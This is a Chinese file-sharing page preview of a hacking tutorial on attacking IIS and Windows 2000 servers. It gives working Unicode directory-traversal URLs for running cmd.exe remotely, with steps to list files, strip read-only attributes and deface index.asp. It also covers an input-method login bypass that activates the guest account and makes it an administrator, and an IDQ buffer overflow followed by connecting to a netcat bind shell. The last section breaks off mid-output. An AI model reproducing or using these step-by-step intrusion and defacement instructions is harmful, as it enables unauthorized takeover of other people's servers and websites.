资源预览内容
第1页 / 共8页
第2页 / 共8页
第3页 / 共8页
第4页 / 共8页
第5页 / 共8页
第6页 / 共8页
第7页 / 共8页
第8页 / 共8页
亲,该文档总共8页全部预览完了,如果喜欢就下载吧!
资源描述
如何IP攻击(1) UNICODE漏洞入侵“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:/scripts/.%c0%af./winnt/system32/cmd.exe这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。我们把/scripts/.%c0%af./winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机如192.168.0.111/scripts/.%c0%af./winnt/system32/cmd.exe意思是192.168.0.111主机有 %c0%af 漏洞,目标有了,我们马上打开浏览器。在网址栏里输入:100.100.100.111/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c: 回车意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如:Directory of c:2002-03-13 03:47p 289 default.asp2002-02-11 03:47p 289 default.htm2002-03-09 04:35p Documents and Settings2002-02-11 03:47p 289 index.asp2002-02-11 03:47p 289 index.htm2002-05-08 05:19a Inetpub2002-01-19 10:37p MSSQL72002-03-09 04:22p Program Files2002-01-23 06:21p WINNT4 File(s) 1,156 bytes5 Dir(s) 2,461,421,568 bytes free-的目录列表。也会碰到看不到文件的空目录。好,我们成功看到了机器里的C盘了。我们在浏览器里输入:192.168.0.111/scripts/.%c0%af./winnt/system32/cmd.exe?/c+set 回车CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:ALLUSERSPROFILE=C:Documents and SettingsAll UsersCommonProgram:Program FilesCommon FilesCOMPUTERNAME=ONComSpec=C:WINNTsystem32cmd.exeCONTENT_LENGTH=0GATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*HTTP_ACCEPT_LANGUAGE=zh-cnHTTP_CONNECTION=Keep-AliveHTTP_HOST=192.168.0.111HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)HTTP_ACCEPT_ENCODING=gzip, deflateHTTPS=offINSTANCE_ID=1LOCAL_ADDR=192.168.0.111NUMBER_OF_PROCESSORS=1Os2LibPath=C:WINNTsystem32os2dll;OS=Windows_NTPath=C:WINNTsystem32;C:WINNT;C:WINNTSystem32Wbem;C:MSSQL7BINNPATH_TRANSLATED=c:inetpubPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSHPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x86 Fa-哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:inetpub意思是他的主页存放在c:inetpub的目录里,知道就好办了。我们用命令:192.168.0.111/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c:inetpub回车我们就可以看到c:inetpub目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。我们用命令:192.168.0.111/scripts/.%c0%af./winnt/system32/attrib.exe?%20-r%20-h%20c:inetpubindex.asp 回车当看到下面的英文CGI ErrorThe specified CGI application misbehaved by not returning a completeset of HTTP headers. The headers it did return are:恭喜你,你可以改他的网页了。-但如果你看到下面的英文就不成功,只好换其他机器了。CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:Access denied - C:inetpubindex.asp-继续。现在用ECHO改网页的内容。100.100.100.111/scripts/.%c0%af./winnt/system32/cmd.exe?/c+echo+网站有漏洞+ c:inetpubindex.asp 回车当看到CGI ErrorThe specified CGI application misbehaved by not returning a completeset of HTTP headers. The headers it did return are:的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。英文WIN2000/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c:中文WIN2000/scripts/.%c0%2f./winnt/system32/cmd.exe/scripts/.%c1%1c./winnt/system32/cmd.exeWIN NT4/scripts/.%c1%9c./winnt/system32/cmd.exe英文WIN2000/scripts/.%c0%af./winnt/system32/cmd.exe通用代码:/scripts/.%255c./winnt/system32/cmd.exe?/c+dir+c:(2) Windows2000输入法漏洞先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” “输入法指南” “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:winntsystem32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” “目标”c:winntsystem32net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” “目标” c:winntsystem32net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。(3) idq溢出漏洞要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出OK出现发送Shellcode成功的提示了,然后我们用NC来连接。进入MS-DOS。进入“nc”的目录。然后:nc -v IP 813c:nc -vv IP 813IP: inverse host lookup failed: h_errno 11004: NO_DATA(UNKNOWN) IP 813 (?): connection refusedsent 0, rcvd 0: NOTSOCKc:看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。c:nc -vv IP 813IP: inverse host lookup failed: h_errno 11004: NO_DATA(UNKNOWN) IP 813 (?) openMicrosoft Windows 2000 Version 5.00.2195(C) Copyright 1985-
网站客服QQ:2055934822
金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号